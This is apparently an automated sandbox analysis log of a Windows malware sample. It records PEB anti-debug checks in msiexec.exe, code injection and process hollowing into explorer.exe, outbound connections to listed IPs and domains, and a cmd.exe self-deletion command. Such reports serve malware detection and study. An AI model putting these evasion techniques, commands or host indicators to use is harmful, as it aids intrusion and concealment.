          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.51.23 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.kayandbernard.com
          Source: C:\Windows\explorer.exeDomain query: www.anygivenrunday.com
          Source: C:\Windows\explorer.exeDomain query: www.cats16.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.247.179.61 80
          Source: C:\Windows\explorer.exeDomain query: www.gb-contracting.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.fnatic-skins.club
          Source: C:\Windows\explorer.exeDomain query: www.benleefoto.com
          Source: C:\Windows\explorer.exeDomain query: www.effectivemarketinginc.com
          Source: C:\Windows\explorer.exeDomain query: www.donelys.com
          Source: C:\Windows\explorer.exeDomain query: www.timbraunmusician.com
          Source: C:\Windows\explorer.exeDomain query: www.palomachurch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Source: C:\Windows\explorer.exeDomain query: www.web-evo.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeMemory written: C:\Users\user\Desktop\g1EhgmCqCD.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1230000
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: explorer.exe, 00000004.00000002.909276935.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmpBinary or memory string: Program Manager
